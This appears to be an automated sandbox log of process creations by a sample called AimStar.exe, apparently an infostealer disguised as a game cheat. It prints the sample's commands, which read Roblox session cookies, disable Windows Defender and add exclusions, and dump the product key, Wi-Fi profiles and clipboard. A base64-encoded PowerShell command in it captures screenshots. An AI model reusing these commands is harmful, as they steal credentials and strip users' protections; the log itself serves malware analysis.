Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Users\user\Desktop\AimStar.exe "C:\Users\user\Desktop\AimStar.exe"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hrvhwpsf\hrvhwpsf.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1C05.tmp" "c:\Users\user\AppData\Local\Temp\hrvhwpsf\CSC4E15ECD8FE3B4FA09888C7495932E1F6.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Section loaded: winmm.dll	Jump to behavior
